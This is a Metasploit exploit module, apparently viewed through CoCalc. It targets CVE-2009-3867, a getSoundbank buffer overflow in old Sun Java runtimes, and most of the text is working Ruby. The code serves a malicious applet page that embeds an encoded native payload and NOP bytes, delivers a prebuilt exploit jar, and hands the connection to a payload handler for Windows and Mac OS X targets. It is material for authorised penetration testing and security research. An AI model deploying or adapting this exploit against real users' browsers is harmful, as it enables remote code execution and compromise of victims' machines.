Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_getsoundbank_bof.rb
31430 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Sun Java JRE getSoundbank file:// URI Buffer Overflow',

19
        'Description' => %q{

20
          This module exploits a flaw in the getSoundbank function in the Sun JVM.

21


22
          The payload is serialized and passed to the applet via PARAM tags. It must be

23
          a native payload.

24


25
          The effected Java versions are JDK and JRE 6 Update 16 and earlier,

26
          JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and

27
          earlier, and SDK and JRE 1.3.1_26 and earlier.

28


29
          NOTE: Although all of the above versions are reportedly vulnerable, only

30
          1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.

31
        },

32
        'License' => MSF_LICENSE,

33
        'Author' => [

34
          'kf', # Original PoC/exploit

35
          'jduck' # metasploit version

36
        ],

37
        'References' => [

38
          [ 'CVE', '2009-3867' ],

39
          [ 'OSVDB', '59711' ],

40
          [ 'BID', '36881' ],

41
          [ 'ZDI', '09-076' ]

42
        ],

43
        'Payload' => {

44
          'Space' => 1024,

45
          'BadChars' => '',

46
          'DisableNops' => true

47
        },

48
        'Targets' => [

49
=begin

50


51
No automatic targetting for now ...

52


53
          [ 'J2SE 1.6_16 Automatic',

54
            {

55
              'Platform' => %w{ linux osx win },

56
              'Arch' => [ARCH_X86, ARCH_PPC]

57
            }

58
          ],

59
=end

60
          [

61
            'J2SE 1.6_16 on Windows x86',

62
            {

63
              'Platform' => 'win',

64
              'Arch' => ARCH_X86

65
            }

66
          ],

67
          [

68
            'J2SE 1.6_16 on Mac OS X PPC',

69
            {

70
              'Platform' => 'osx',

71
              'Arch' => ARCH_PPC

72
            }

73
          ],

74
          [

75
            'J2SE 1.6_16 on Mac OS X x86',

76
            {

77
              'Platform' => 'osx',

78
              'Arch' => ARCH_X86

79
            }

80
          ],

81
        ],

82
        'DefaultTarget' => 0,

83
        'DisclosureDate' => '2009-11-04',

84
        'Notes' => {

85
          'Reliability' => UNKNOWN_RELIABILITY,

86
          'Stability' => UNKNOWN_STABILITY,

87
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

88
        }

89
      )

90
    )

91
  end

92


93
  def exploit

94
    # load the static jar

95
    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2009-3867.jar')

96
    fd = File.open(path, 'rb')

97
    @jar_data = fd.read(fd.stat.size)

98
    fd.close

99


100
    super

101
  end

102


103
  def on_request_uri(cli, req)

104
    # Create a cached mapping between IP and detected target

105
    @targetcache ||= {}

106
    @targetcache[cli.peerhost] ||= {}

107
    @targetcache[cli.peerhost][:update] = Time.now.to_i

108


109
    if (target.name =~ /Automatic/)

110
      case req.headers['User-Agent']

111
      when /Windows/i

112
        print_status('Choosing a Windows target')

113
        @targetcache[cli.peerhost][:target] = targets[1]

114
      when /PPC Mac OS X/i

115
        print_status('Choosing a Mac OS X PPC target')

116
        @targetcache[cli.peerhost][:target] = targets[2]

117
      when /Intel Mac OS X/i

118
        print_status('Choosing a Mac OS X x86 target')

119
        @targetcache[cli.peerhost][:target] = targets[3]

120
      else

121
        print_status("Unknown target for: #{req.headers['User-Agent']}")

122
      end

123
    end

124


125
    # Clean the cache

126
    rmq = []

127
    @targetcache.each_key do |addr|

128
      if (Time.now.to_i > @targetcache[addr][:update] + 60)

129
        rmq.push addr

130
      end

131
    end

132


133
    rmq.each { |addr| @targetcache.delete(addr) }

134


135
    # Request processing

136
    if (!req.uri.match(/\.jar$/i))

137


138
      # Redirect to the base directory so the applet code loads...

139
      if (!req.uri.match(%r{/$}))

140
        print_status('Sending redirect so path ends with / ...')

141
        send_redirect(cli, get_resource + '/', '')

142
        return

143
      end

144


145
      # Display the applet loading HTML

146
      print_status('Sending HTML')

147
      send_response_html(cli, generate_html(payload.encoded),

148
                         {

149
                           'Content-Type' => 'text/html',

150
                           'Pragma' => 'no-cache'

151
                         })

152
      return

153
    end

154


155
    # Send the actual applet over

156
    print_status('Sending applet')

157
    send_response(cli, generate_applet(cli, req),

158
                  {

159
                    'Content-Type' => 'application/octet-stream',

160
                    'Pragma' => 'no-cache'

161
                  })

162


163
    # Handle the payload

164
    handler(cli)

165
  end

166


167
  def generate_html(pl)

168
    html = <<~EOF

169
      <html>

170
      <head>

171
      <!-- <meta http-equiv=refresh content=10 /> -->

172
      </head>

173
      <body>

174
      <applet width='100%' height='100%' code='AppletX' archive='JARNAME'>

175
      <param name='sc' value='SCODE' />

176
      <param name='np' value='NOPS' />

177
      </applet>

178
      </body>

179
      </html>

180
    EOF

181


182
    # finalize the html

183
    jar_name = rand_text_alphanumeric(32) + '.jar'

184
    html.gsub!(/JARNAME/, jar_name)

185


186
    # add payload

187
    debug_payload = false

188
    pload = ''

189
    pload << "\xcc" if debug_payload

190
    pload << pl

191
    if ((pload.length % 4) > 0)

192
      pload << rand_text((4 - (pload.length % 4)))

193
    end

194
    if debug_payload

195
      print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))

196
    end

197
    html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))

198


199
    # add nops

200
    nops = "\x90\x90\x90\x90"

201
    html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))

202
    # print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))

203


204
    return html

205
  end

206


207
  def generate_applet(cli, _req)

208
    if (target.name =~ /Automatic/)

209
      if (@targetcache[cli.peerhost][:target])

210
        @targetcache[cli.peerhost][:target]

211
      else

212
        return ''

213
      end

214
    else

215
      target

216
    end

217


218
    return @jar_data

219
  end

220
end

221


222